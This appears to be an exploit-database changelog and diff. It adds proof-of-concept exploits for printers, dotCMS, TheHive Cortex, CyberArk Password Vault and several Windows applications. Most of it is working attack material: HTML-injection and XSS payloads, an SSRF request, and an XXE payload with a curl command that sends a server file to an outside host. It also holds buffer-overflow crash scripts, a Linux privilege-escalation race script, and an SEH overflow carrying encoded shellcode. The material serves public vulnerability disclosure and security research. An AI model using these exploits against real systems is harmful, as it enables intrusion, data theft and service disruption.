DB: 2019-05-11

12 changes to exploits/shellcodes

jetCast Server 2.0 - Denial of Service (PoC)
SpotIM 2.2 - Denial of Service (PoC)
SpotPaltalk 1.1.5 - Denial of Service (PoC)
ASPRunner.NET 10.1 - Denial of Service (PoC)
PHPRunner 10.1 - Denial of Service (PoC)
TheHive Project Cortex < 1.15.2 - Server-Side Request Forgery
dotCMS 5.1.1 - HTML Injection
RICOH SP 4510DN Printer - HTML Injection
RICOH SP 4520DN Printer - HTML Injection
CyberArk Enterprise Password Vault 10.7 - XML External Entity Injection

exploits/hardware/webapps/46826.txt

@@ -0,0 +1,42 @@
+# Exploit Title: RICOH SP 4510DN Printer - HTML Injection
+# Date: 2019-05-06 
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://www.ricoh.com/
+# Hardware Link: https://www.ricoh-europe.com/products/office-printers-fax/single-function-printers/sp-4520dn.html
+# Software: RICOH Printer
+# Product Version: SP 4510DN
+# Vulernability Type: Code Injection
+# Vulenrability: HTML Injection
+# CVE: CVE-2019-11845
+
+# An HTML Injection vulnerability has been discovered on the RICOH SP 4510DN via the /web/entry/en/address/adrsSetUserWizard.cgi entryNameIn parameter.
+
+# HTTP POST Request :
+
+POST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
+Accept: text/plain, */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://TARGET/web/entry/en/address/adrsList.cgi
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 102
+DNT: 1
+Connection: close
+Cookie: risessionid=071652497206133; cookieOnOffChecker=on; wimsesid=98044857
+
+mode=ADDUSER&step=BASE&wimToken=958429369&entryIndexIn=00001&entryNameIn=%22%3E%3Ch1%3ETEST%3C%2Fh1%3E
+
+# HTTP Response :
+
+HTTP/1.1 200 OK
+Date: Mon, 06 May 2019 11:42:46 GMT
+Server: Web-Server/3.0
+Content-Type: text/plain
+Expires: Mon, 06 May 2019 11:42:46 GMT
+Set-Cookie: cookieOnOffChecker=on; path=/
+Connection: close
+
+[14]

exploits/hardware/webapps/46827.txt

@@ -0,0 +1,43 @@
+# Exploit Title: RICOH SP 4520DN Printer - HTML Injection
+# Date: 2019-05-06 
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://www.ricoh.com/
+# Hardware Link: https://www.ricoh-europe.com/products/office-printers-fax/single-function-printers/sp-4520dn.html
+# Software: RICOH Printer
+# Product Version: SP 4520DN
+# Vulernability Type: Code Injection
+# Vulenrability: HTML Injection
+# CVE: CVE-2019-11844
+
+# An HTML Injection vulnerability has been discovered on the RICOH SP 4520DN via the /web/entry/en/address/adrsSetUserWizard.cgi
+# entryNameIn or entryDisplayNameIn parameter.
+
+# HTTP POST Request :
+
+POST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
+Accept: text/plain, */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://TARGET/web/entry/en/address/adrsList.cgi
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 219
+DNT: 1
+Connection: close
+Cookie: risessionid=110508462500758; cookieOnOffChecker=on; wimsesid=598742008
+
+mode=ADDUSER&step=BASE&wimToken=279565363&entryIndexIn=00001&entryNameIn=%22%3E%3Ch1%3ETEST%3C%2Fh1%3E&entryDisplayNameIn=%22%3E%3Ch1%3ETEST%3C%2Fh1%3E&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1
+
+# HTTP Response :
+
+HTTP/1.1 200 OK
+Date: Mon, 06 May 2019 11:00:09 GMT
+Server: Web-Server/3.0
+Content-Type: text/plain
+Expires: Mon, 06 May 2019 11:00:09 GMT
+Set-Cookie: cookieOnOffChecker=on; path=/
+Connection: close
+
+[14]

exploits/jsp/webapps/46825.txt

@@ -0,0 +1,37 @@
+# Exploit Title: dotCMS 5.1.1 - HTML Injection
+# Date: 2019-05-09 
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://dotcms.com/
+# Software Link: https://github.com/dotCMS
+# Software: dotCMS
+# Product Version: 5.1.1
+# Vulernability Type: Code Injection
+# Vulenrability: HTML Injection and Cross-site Scripting
+# CVE: CVE-2019-11846
+
+# HTTP POST Request :
+
+POST /servlets/ajax_file_upload?fieldName=binary3 HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://TARGET/c/portal/layout?p_l_id=b7ab5d3c-5ee0-4195-a17e-8f5579d718dd&p_p_id=site-browser&p_p_action=1&p_p_state=maximized&angularCurrentPortlet=site-browser&p_p_mode=view&_site_browser_struts_action=%2Fext%2Fcontentlet%2Fedit_contentlet&_site_browser_cmd=new&selectedStructure=33888b6f-7a8e-4069-b1b6-5c1aa9d0a48d&folder=SYSTEM_FOLDER&referer=/c/portal/layout%3Fp_l_id%3Db7ab5d3c-5ee0-4195-a17e-8f5579d718dd%26p_p_id%3Dsite-browser%26p_p_action%3D0%26p_p_state%3Dmaximized%26angularCurrentPortlet%3Dsite-browser%26p_p_mode%3Dview%26_site_browser_struts_action%3D%252Fext%252Fbrowser%252Fview_browser&in_frame=true&frame=detailFrame&container=true&angularCurrentPortlet=site-browser
+Content-Type: multipart/form-data; boundary=---------------------------5890268631313811380287956669
+Content-Length: 101313
+DNT: 1
+Connection: close
+Cookie: messagesUtk=2366e7c3b5af4c8c93bb11d0c994848a; BACKENDID=172.18.0.3; JSESSIONID=65C16EFBEE5B7176B22083A0CA451F0A.c16f6b7d05d9; hs-messages-hide-welcome-message=true; access_token=eyJhbGciOiJIUzI1NiJ9.eyJqdGkiOiJkZGFlZmEzNS0yYmMyLTQ4MTEtOTRjNi0xNGE0OTk4YzFkNDAiLCJpYXQiOjE1NTczOTY0NzYsInVwZGF0ZWRfYXQiOjEyMDQ4MjQ5NjEwMDAsInN1YiI6ImRvdGNtcy5vcmcuMSIsImlzcyI6IjRiNTkyYjIyLTBiMmEtNGI2ZC05NmU4LTdjMzBiMzgzOTM1ZiJ9.F8_L_Cu96pkYcwTl4ex_zfrA-Fk-rqNUz24oCV0gOmc; DWRSESSIONID=EZToDkzmi*mMXCayMxskFA75sGm
+Upgrade-Insecure-Requests: 1
+
+-----------------------------5890268631313811380287956669
+Content-Disposition: form-data; name="binary3FileUpload"; filename="\"><img src=x onerror=alert(\"ismailtasdelen\")> .json"
+Content-Type: application/json
+
+# HTTP Response :
+
+HTTP/1.1 200 
+Content-Length: 0
+Date: Thu, 09 May 2019 10:23:44 GMT
+Connection: close

exploits/linux/local/9844.py

@@ -1,13 +1,14 @@
-# This is a PoC based off the PoC release by Earl Chew
+# This is a PoC based off the PoC release by Earl Chew (Updated by Brian Peters)
 # Linux Kernel 'pipe.c' Local Privilege Escalation Vulnerability
 # PoC by Matthew Bergin
 # Bugtraq ID:       36901
 #
-# E-DB Note: Exploit Update ~ https://github.com/offensive-security/exploitdb/pull/82/files
+# E-DB Note: Exploit Update v2 ~ https://github.com/offensive-security/exploitdb/pull/82/files
 
 import os
 import time
 import random
+import subprocess
 #infinite loop
 i = 0
 x = 0
@@ -15,7 +16,9 @@ while (i == 0):
         os.system("sleep 1")
         while (x == 0):
                 time.sleep(random.random()) #random int 0.0-1.0
-                pid = str(os.system("ps -efl | grep 'sleep 1' | grep -v grep | { read PID REST ; echo $PID; }"))
+                p = subprocess.Popen(["ps -elf | grep 'sleep 1' | grep -v 'grep' | awk '{print $4}'"], stdout=subprocess.PIPE, shell=True)
+		result = p.stdout.read()
+		pid = result.replace('\n', '').replace('\r', '')
                 if (pid == "0"): #need an active pid, race condition applies
                         print "[+] Didnt grab PID, got: " + pid + " -- Retrying..."
                         break

exploits/multiple/webapps/46820.txt

@@ -0,0 +1,31 @@
+# Exploit Title: SSRF in TheHive Project Cortex <= 2.1.3
+# Date: 2/26/2019
+# Exploit Author: Alexandre Basquin
+# Vendor Homepage: https://blog.thehive-project.org
+# Software Link: https://github.com/TheHive-Project/Cortex
+# Version: Cortex <= 2.1.3
+# Tested on: 2.1.3
+# CVE : CVE-2019-7652
+
+# Exploit description
+
+TheHive Project Cortex version <= 2.1.3 is vulnerable to a SSRF vulnerability in the "UnshortenLink_1_0" analyzer.
+
+References:
+
+https://blog.thehive-project.org/2019/02/11/unshortenlink-ssrf-and-cortex-analyzers-1-15-2/
+
+
+
+POC:
+
+1. Create a new analysis
+
+2. Select Data Type "URL"
+
+3. Put your SSRF payload in the Data parameter (e.g. "http://127.0.0.1:22")
+
+4. Result can be seen in the main dashboard.
+
+
+Reported to TheHive Project by Alexandre Basquin on 1/24/2019

exploits/multiple/webapps/46828.txt

@@ -0,0 +1,97 @@
+# Exploit Title: CyberArk XML External Entity (XXE) Injection in SAML
+authentication
+# Date: 10/05/2019
+# Exploit Author: Marcelo Toran (@spamv)
+# Vendor Homepage: https://www.cyberark.com
+# Version: <=10.7
+# CVE : CVE-2019-7442
+
+
+-----------Product description
+The CyberArk Enterprise Password Vault is a privileged access security
+solution to store, monitor and rotate credentials. The main objective
+of the solution is protecting the privileged accounts that are used to
+administrate the systems of the organisations.
+
+-----------Vulnerability description
+This vulnerability allows remote attackers to disclose sensitive
+information or potentially bypass the authentication system.
+
+-----------Vulnerability Details
+# Exploit Title: XML External Entity (XXE) Injection in SAML authentication
+# Affected Component: Password Vault Web Access (PVWA)
+# Affected Version: <=10.7
+# Vendor: CyberArk
+# Vendor Homepage: https://www.cyberark.com
+# Date: 18/12/2018
+# CVSS Base Score: 7.5 (High)
+# CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+# Exploit Author: Marcelo Torán (Nixu Corporation)
+# CVE: CVE-2019-7442
+# CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7442
+
+-----------Technical Description
+It has been found that the XML parser of the SAML authentication
+system of the Password Vault Web Access (PVWA) is vulnerable to XML
+External Entity (XXE) attacks via a crafted DTD. No user interaction
+or privileges are required as the vulnerability is triggered in
+pre-authentication.
+The vulnerable component is: https://example.com/PasswordVault/auth/saml
+The vulnerable argument: SAMLResponse
+
+-----------POC
+
+# pepe.dtd is an external entity stored in a remote web server where we define the file that will be read and the server that will be used for the exfiltration:
+<!ENTITY % data SYSTEM "file:///C:/Windows/win.ini">
+<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://externalserver.com/?%data;'>">
+ 
+ 
+# The malicious XML payload where is defined the address of the external entity defined in the previous step:
+<!DOCTYPE r [
+<!ELEMENT r ANY >
+<!ENTITY % sp SYSTEM "http://externalserver.com/pepe.dtd">
+%sp;
+ 
+%param1;
+ 
+]>
+<r>&exfil;</r>
+ 
+ 
+# XML payload base64 encoded + equal symbols URL encoded:
+PCFET0NUWVBFIHIgWwo8IUVMRU1FTlQgciBBTlkgPgo8IUVOVElUWSAlIHNwIFNZU1RFTSAiaHR0cDovL2V4dGVybmFsc2VydmVyLmNvbS9wZXBlLmR0ZCI+CiVzcDsKJXBhcmFtMTsKXT4KPHI+JmV4ZmlsOzwvcj4%3d
+ 
+ 
+# CURL command to exploit the XXE:
+curl -i -s -k  -X $'POST' \
+    -H $'Host: example.com' -H $'User-Agent: PoC CyberArk XXE Injection :(' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 177' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
+    --data-binary $'SAMLResponse=PCFET0NUWVBFIHIgWwo8IUVMRU1FTlQgciBBTlkgPgo8IUVOVElUWSAlIHNwIFNZU1RFTSAiaHR0cDovL2V4dGVybmFsc2VydmVyLmNvbS9wZXBlLmR0ZCI+CiVzcDsKJXBhcmFtMTsKXT4KPHI+JmV4ZmlsOzwvcj4%3d' \
+    $'https://example.com/PasswordVault/auth/saml/'
+ 
+ 
+# Checking the logs of the external server:
+example.com - - [XX/XX/XX XX:XX:XX] "GET /pepe.dtd HTTP/1.1" 200 -
+example.com - - [XX/XX/XX XX:XX:XX] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5Bfiles%5D%0D%0A%5BMail%5D%0D%0AMAPI=1 HTTP/1.1" 200 -
+ 
+ 
+# And decoding the content of the logs it's possible to read the requested file of the machine:
+; for 16-bit app support
+[fonts]
+[extensions]
+[mci extensions]
+[files]
+[Mail]
+MAPI=1
+
+-----------Timeline
+18/12/2018 – Vulnerability discovered
+10/01/2019 – Vendor notified
+23/01/2019 – Vulnerability accepted
+05/02/2019 – CVE number requested
+05/02/2019 – CVE number assigned
+19/02/2019 – Vendor released a patch
+19/02/2019 – Advisory released
+
+-----------Proof of Concept (PoC)
+
+https://www.octority.com/2019/05/07/cyberark-enterprise-password-vault-xml-external-entity-xxe-injection/

exploits/windows/dos/46819.py

@@ -0,0 +1,22 @@
+#Exploit Title:  jetCast Server 2.0 - Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-09
+#Vendor Homepage: http://www.jetaudio.com/
+#Software Link: http://www.jetaudio.com/download/5fc01426-741d-41b8-a120-d890330ec672/jetAudio/Download/jetCast/build/JCS2000.exe
+#Tested Version: 2.0
+#Tested on: Windows 7 Service Pack 1 x64 
+
+#Steps to produce the crash:
+#1.- Run python code: jetCast_Server_2.0.py
+#2.- Open jetCast.txt and copy content to clipboard
+#2.- Open jetCast Server 
+#3.- Select Config 
+#4.- In "Log directory" Paste ClipBoard 
+#5.- Click on "Ok"
+#6.- Click on "Start"
+#7.- Crashed
+
+cod = "\x41" * 5000
+f = open('jetCast.txt', 'w')
+f.write(cod)
+f.close()

exploits/windows/dos/46821.py

@@ -0,0 +1,22 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: SpotIM 2.2 - 'Name/Key' Denial of Service (PoC)
+# Date: 09/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: http://www.nsauditor.com
+# Software Link http://www.nsauditor.com/downloads/spotim_setup.exe
+# Version: 2.2
+# Tested on: Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script "SpotIM.py", it will create a new file "SpotIM.txt"
+# 2.- Copy the text from the generated SpotIM.txt file to clipboard
+# 3.- Open SpotIM
+# 4.  Select "Register" > "Enter Registration Code..."
+# 5.- Paste clipboard in the Name/Key field 
+# 6.- Click 'OK'
+# 7.- Crashed
+
+buffer = "\x41" * 1000
+f = open ("SpotIM.txt", "w")
+f.write(buffer)
+f.close()

exploits/windows/dos/46822.py

@@ -0,0 +1,22 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: SpotPaltalk 1.1.5 - 'Name/Key' Denial of Service (PoC)
+# Date: 09/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: http://www.nsauditor.com
+# Software Link http://www.nsauditor.com/downloads/spotpaltalk_setup.exe
+# Version: 1.1.5
+# Tested on: Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script "SpotPaltalk.py", it will create a new file "SpotPaltalk.txt"
+# 2.- Copy the text from the generated SpotPaltalk.txt file to clipboard
+# 3.- Open SpotPalTalk
+# 4.  Select "Register" > "Enter Registration Code..."
+# 5.- Paste clipboard in the Name/Key field 
+# 6.- Click 'OK'
+# 7.- Crashed
+
+buffer = "\x41" * 1000
+f = open ("SpotPaltalk.txt", "w")
+f.write(buffer)
+f.close()

exploits/windows/dos/46823.py

@@ -0,0 +1,22 @@
+#Exploit Title:  ASPRunner.NET 10.1 - Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-09
+#Vendor Homepage: https://xlinesoft.com/
+#Software Link: https://xlinesoft.com/asprunnernet/download.htm
+#Tested Version: 10.1
+#Tested on: Windows 7 Service Pack 1 x64 
+
+#Steps to produce the crash:
+#1.- Run python code: ASPRunner_net_10_1.py
+#2.- Open ASPRunner_10_1.txt and copy content to clipboard
+#3.- Open ASPRunner.NET
+#4.- Click on "Next" > Select "SQLite" database > click on "Next"
+#5.- Click on "Create new database" 
+#6.- In "Table name" field Paste Clipboarad
+#7.- Click on "Create table"
+#8.- Crashed
+
+cod = "\x41" * 10000
+f = open('ASPRunner_10_1.txt', 'w')
+f.write(cod)
+f.close()

exploits/windows/dos/46824.py

@@ -0,0 +1,22 @@
+#Exploit Title:  PHPRunner 10.1 - Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-09
+#Vendor Homepage: https://xlinesoft.com/
+#Software Link: https://xlinesoft.com/phprunner/download.htm
+#Tested Version: 10.1
+#Tested on: Windows 7 Service Pack 1 x64 
+
+#Steps to produce the crash:
+#1.- Run python code: PHPRunner_10_1.py
+#2.- Open PHPRunner_10_1.txt and copy content to clipboard
+#3.- Open PHPRunner
+#4.- Click on "Next" > Select "Microsoft Access" database > click on "Next"
+#5.- Click on "Create new database" > click on "Create table"
+#6.- Select "Create dashboard" > in "Name" field Paste Clipboarad
+#7.- Click on "Ok"
+#8.- Crashed
+
+cod = "\x41" * 10000
+f = open('PHPRunner_10_1.txt', 'w')
+f.write(cod)
+f.close()

exploits/windows/local/46805.py

@@ -1,4 +1,4 @@
-# Title: Admin Express v1.2.5.485 Folder Path Local SEH Alphanumeric Encoded Buffer Overflow
+# Title: Admin Express v1.2.5.485 'Folder Path' Local SEH Alphanumeric Encoded Buffer Overflow
 # Date: May 6th, 2019
 # Author: Connor McGarr (https://connormcgarr.github.io)
 # Vendor Homepage: https://admin-express.en.softonic.com/
@@ -9,14 +9,19 @@
 # TO RUN:
 # 1. Run python script
 # 2. Copy contents of pwn.txt
-# 3. Open AdminExpress
+# 3. Open Admin Express
 # 4. Select System Compare
-# 5. Paste contents into Folder Path on the left hand side
-# 6. Press the scale icon in the middle of the screen, under the Services and Running Processes tabs
+# 5. Paste contents into the left-hand side Folder Path field
+# 6. Click the scale icon in the middle of the screen, under the Services and Running Processes tabs
 
 
-# This got a bit hairy. We manually encoded our shellcode, and we had to use the sub method for each encode.
-# 05 was a bad char for us, which was an add eax opcode. We could use (in hex) 1-4,6,10-7E. This was an odd character set.
+# This got a bit hairy. We manually encoded our shellcode and had to use the sub method for encoding each line of payload.
+# 05 was a bad character for us, which is an add eax opcode. We could use (in hex) 1-4,6,10-7E. This was an odd character set.
+
+# Can replace with a shell, if you are willing to do the encoding and decoding math Too preoccupied for now, so here is calc.exe
+# You would need to use logical AND plus the sub eax opcodes to get a value on the stack that could jump back to the A buffer, where there is
+# much more room. Then you would need to align the stack with the stack pointer value you need (not 0x012F3F4 as used below) and write to the stack upwards.
+# You should have enough room for all of the logical AND plus sub eax commands to get a full-sized shell payload on the stack.
 
 # calc.exe shellcode:
 # "\x31\xc9\x51\x68"
@@ -24,87 +29,85 @@
 # "\x54\xB8\xc7\x93"
 # "\xc2\x77\xff\xd0"
 
-# Can replace with a shell, if you are willing to do the encoding and decoding math :-) Too preoccupied for now, so here is a calc.exe
-# You would need to use logicla AND and the SUB EAX opcodes to get a value on the stack that could jump back to the A buffer, where there is
-# much more room. Then you would need to align the stack with the value you need (not 0x012F3F4 as used below), and write upwards on the stack.
-# You should have enough room for all of the logical AND and SUB EAX commands to get a full shell on the stack.
-
 # For zeroing out registers before manual shellcode
 zero = "\x25\x01\x01\x01\x01"           # and eax, 0x01010101
 zero += "\x25\x10\x10\x10\x10"          # and eax, 0x10101010
 
-# For restoring stack pointer before execution of shellcode, due to
-# old stack pointer value needed. This puts 0x0012DC98 into ECX, to be used later
-restore = "\x54"		# push esp; (pushing the current value of ESP, which needs to be restored later, onto the stack)
-restore += "\x59"		# pop ecx; (holding the value of old ESP in ECX, to be called later.)
-restore += "\x51"		# push ecx; (to get the value on the stack for the mov esp command later)
+# We need to save the current stack pointer before execution of shellcode, due to
+# old stack pointer value needed when executing our payload of calc.exe. This puts the current stack pointer 0x0012DC98 into ECX, to be used later
+restore = "\x54" # push esp; (pushing the current value of ESP, which needs to be restored later, onto the stack)
+restore += "\x59" # pop ecx; (holding the value of old ESP in ECX, to be called later.)
+restore += "\x51" # push ecx; (to get the value on the stack for the mov esp command later)
 
 # Stack alignment
 # Need to make ESP 0x012F3F4. Using sub method to write that value onto the stack.
 # After making ESP 0x012F3F4, it should be the same value as EAX- so we can write up the stack.
-alignment = "\x54"			# push esp
-alignment += "\x58"			# pop eax; (puts the value of ESP into EAX)
+alignment = "\x54" # push esp
+alignment += "\x58" # pop eax; (puts the value of ESP into EAX)
 
-# Write these 3 sub values in normal format, since memory address, not instruction to be executed.
+# Write these 3 sub values in normal format, since memory address, not instruction to be executed. You do not have to do
+# it this way, but I do my calculations in normal format to remind me it is a memory address, when doing hex max. For my
+# other operations, I used little endian. If you do all of the calculations in one way, you do not need to flip the sub 
+# math difference results. This is how I keep things straight
 # 384D5555 364D5555 364E5555
-alignment += "\x2d\x38\x4d\x55\x55"	# sub eax, 0x384D5555
-alignment += "\x2d\x36\x4d\x55\x55"	# sub eax, 0x364D5555
-alignment += "\x2d\x36\x4e\x55\x55"	# sub eax, 0x364E5555
-alignment += "\x50"			# push eax
-alignment += "\x5c"			# pop esp; (puts the value of eax back into esp)
+alignment += "\x2d\x38\x4d\x55\x55" # sub eax, 0x384D5555
+alignment += "\x2d\x36\x4d\x55\x55" # sub eax, 0x364D5555
+alignment += "\x2d\x36\x4e\x55\x55" # sub eax, 0x364E5555
+alignment += "\x50" # push eax
+alignment += "\x5c" # pop esp; (puts the value of eax back into esp)
 
 # calc.exe shellcode, via the sub method. Values needed are as followed. Reference the calc.exe shellcode line for line numbers.
 # 1st line = 2C552D14 01552D14 01562E16
 shellcode = zero
-shellcode += "\x2d\x14\x2d\x55\x2c"	# sub eax, 0x2C552D14
-shellcode += "\x2d\x14\x2d\x55\x01"	# sub eax, 0x01562D14
-shellcode += "\x2d\x16\x2e\x56\x01"	# sub eax, 0x01562E16
-shellcode += "\x50"			# push eax; (get the value on the stack). We will do this for all remaining steps like this one.
+shellcode += "\x2d\x14\x2d\x55\x2c" # sub eax, 0x2C552D14
+shellcode += "\x2d\x14\x2d\x55\x01" # sub eax, 0x01562D14
+shellcode += "\x2d\x16\x2e\x56\x01" # sub eax, 0x01562E16
+shellcode += "\x50" # push eax; (get the value on the stack). We will do this for all remaining steps like this one.
 
 # 2nd line = 24121729 24121739 2414194A
 shellcode += zero
-shellcode += "\x2d\x29\x17\x12\x24"	# sub eax, 0x24121729
+shellcode += "\x2d\x29\x17\x12\x24" # sub eax, 0x24121729
 shellcode += "\x2d\x39\x17\x12\x24"     # sub eax, 0x24121739
 shellcode += "\x2d\x4a\x19\x14\x24"     # sub eax, 0x2414194A (was 40 at the end, but a miscalc happened. Changed to 4A)
-shellcode += "\x50"			# push eax
+shellcode += "\x50" # push eax
 
 # 3rd line = 34313635 34313434 34313434
 shellcode += zero
-shellcode += "\x2d\x35\x36\x31\x34"	# sub eax, 0x34313635
-shellcode += "\x2d\x34\x34\x31\x34"	# sub eax, 0x34313434
-shellcode += "\x2d\x34\x34\x31\x34"	# sub eax, 0x34313434
-shellcode += "\x50"			# push eax
+shellcode += "\x2d\x35\x36\x31\x34" # sub eax, 0x34313635
+shellcode += "\x2d\x34\x34\x31\x34" # sub eax, 0x34313434
+shellcode += "\x2d\x34\x34\x31\x34" # sub eax, 0x34313434
+shellcode += "\x50" # push eax
 
 # 4th line = 323A1245 323A1245 333A1245
 shellcode += zero
-shellcode += "\x2d\x45\x12\x3a\x32"	# sub eax, 0x323A1245
-shellcode += "\x2d\x45\x12\x3a\x32"	# sub eax, 0x323A1245
-shellcode += "\x2d\x45\x12\x3a\x33"	# sub eax, 0x333A1245
-shellcode += "\x50"			# push eax
+shellcode += "\x2d\x45\x12\x3a\x32" # sub eax, 0x323A1245
+shellcode += "\x2d\x45\x12\x3a\x32" # sub eax, 0x323A1245
+shellcode += "\x2d\x45\x12\x3a\x33" # sub eax, 0x333A1245
+shellcode += "\x50" # push eax
 
 # We need to restore the old ESP value of 0x0012DC98 to spawn calc.exe. Since it is a syscall,
-# We need the ESP value before execution. We will do this by performing MOV ECX, ESP (remember ECX contains old ESP!)
+# we need the ESP value before execution. We will do this by performing MOV ECX, ESP (remember ECX contains old ESP!).
 # Here are the 3 values: 403F2711 3F3F2711 3F3F2811
 move = zero
-move += "\x2d\x40\x3f\x27\x11"		# sub eax, 0x3F3F2711
-move += "\x2d\x3f\x3f\x27\x11"		# sub eax, 0x3F3F2711
-move += "\x2d\x3f\x3f\x28\x11"		# sub eax, 0x3F3F2811
-move += "\x50"				# push eax
+move += "\x2d\x40\x3f\x27\x11" # sub eax, 0x403F2711
+move += "\x2d\x3f\x3f\x27\x11" # sub eax, 0x3F3F2711
+move += "\x2d\x3f\x3f\x28\x11" # sub eax, 0x3F3F2811
+move += "\x50" # push eax
 
 # All together now.
 payload = "\x41" * 4260
-payload += "\x70\x7e\x71\x7e"		# JO 126 hex bytes. If jump fails, default to JNO 126 hex bytes
-payload += "\x42\x4c\x01\x10"		# 0x10014c42 pop pop ret wmiwrap.DLL
+payload += "\x70\x7e\x71\x7e" # JO 126 bytes. If jump fails, default to JNO 126 bytes
+payload += "\x42\x4c\x01\x10" # 0x10014c42 pop pop ret wmiwrap.DLL
 
 # There are 2 NULL (\x00) terminators in our buffer of A's, near our nSEH jump. We are going to jump far away from them
 # so we have enough room for our shellcode and to decode.
-payload += "\x41" * 122			# add padding since we jumped 7e (126 bytes) above
-payload += "\x70\x7e\x71\x7e"		# JO or JNO another 126 bytes, so shellcode can decode
+payload += "\x41" * 122 # add padding since we jumped 7e hex bytes (126 bytes) above
+payload += "\x70\x7e\x71\x7e" # JO or JNO another 126 bytes, so shellcode can decode
 payload += "\x41" * 124
-payload += "\x70\x7e\x71\x7e"		# JO or JNO another 126 bytes, so shellcode can decode
+payload += "\x70\x7e\x71\x7e" # JO or JNO another 126 bytes, so shellcode can decode
 payload += "\x41" * 124
-payload += "\x70\x79\x71\x79"		# JO or JNO only 121 bytes
-payload += "\x41" * 121			# NOP is in the restricted chars. Using \x41 as a slide into alignment
+payload += "\x70\x79\x71\x79" # JO or JNO only 121 bytes
+payload += "\x41" * 121 # NOP is in the restricted characters. Using \x41 as a slide into alignment
 payload += restore
 payload += alignment
 payload += shellcode

files_exploits.csv

@@ -6413,7 +6413,12 @@ id,file,description,date,author,type,platform,port
 46810,exploits/windows/dos/46810.py,"jetAudio 8.1.7.20702 Basic - 'Enter URL' Denial of Service (PoC)",2019-05-08,"Victor Mondragón",dos,windows,
 46816,exploits/windows/dos/46816.py,"Lyric Video Creator 2.1 - '.mp3' Denial of Service (PoC)",2019-05-09,"Alejandra Sánchez",dos,windows,
 46817,exploits/windows/dos/46817.py,"Lyric Maker 2.0.1.0 - Denial of Service (PoC)",2019-05-09,"Alejandra Sánchez",dos,windows,
+46819,exploits/windows/dos/46819.py,"jetCast Server 2.0 - Denial of Service (PoC)",2019-05-10,"Victor Mondragón",dos,windows,
 46818,exploits/windows/dos/46818.py,"Convert Video jetAudio 8.1.7 - Denial of Service (PoC)",2019-05-09,"Alejandra Sánchez",dos,windows,
+46821,exploits/windows/dos/46821.py,"SpotIM 2.2 - Denial of Service (PoC)",2019-05-10,"Alejandra Sánchez",dos,windows,
+46822,exploits/windows/dos/46822.py,"SpotPaltalk 1.1.5 - Denial of Service (PoC)",2019-05-10,"Alejandra Sánchez",dos,windows,
+46823,exploits/windows/dos/46823.py,"ASPRunner.NET 10.1 - Denial of Service (PoC)",2019-05-10,"Victor Mondragón",dos,windows,
+46824,exploits/windows/dos/46824.py,"PHPRunner 10.1 - Denial of Service (PoC)",2019-05-10,"Victor Mondragón",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -41245,3 +41250,8 @@ id,file,description,date,author,type,platform,port
 46804,exploits/multiple/webapps/46804.txt,"Prinect Archive System 2015 Release 2.6 - Cross-Site Scripting",2019-05-07,alt3kx,webapps,multiple,80
 46811,exploits/linux/webapps/46811.txt,"NetNumber Titan ENUM/DNS/NP 7.9.1 - Path Traversal / Authorization Bypass",2019-05-08,MobileNetworkSecurity,webapps,linux,
 46815,exploits/php/webapps/46815.txt,"Zoho ManageEngine ADSelfService Plus 5.7 < 5702 build - Cross-Site Scripting",2019-05-09,"Ibrahim Raafat",webapps,php,
+46820,exploits/multiple/webapps/46820.txt,"TheHive Project Cortex < 1.15.2 - Server-Side Request Forgery",2019-05-10,"Alexandre Basquin",webapps,multiple,
+46825,exploits/jsp/webapps/46825.txt,"dotCMS 5.1.1 - HTML Injection",2019-05-10,"Ismail Tasdelen",webapps,jsp,
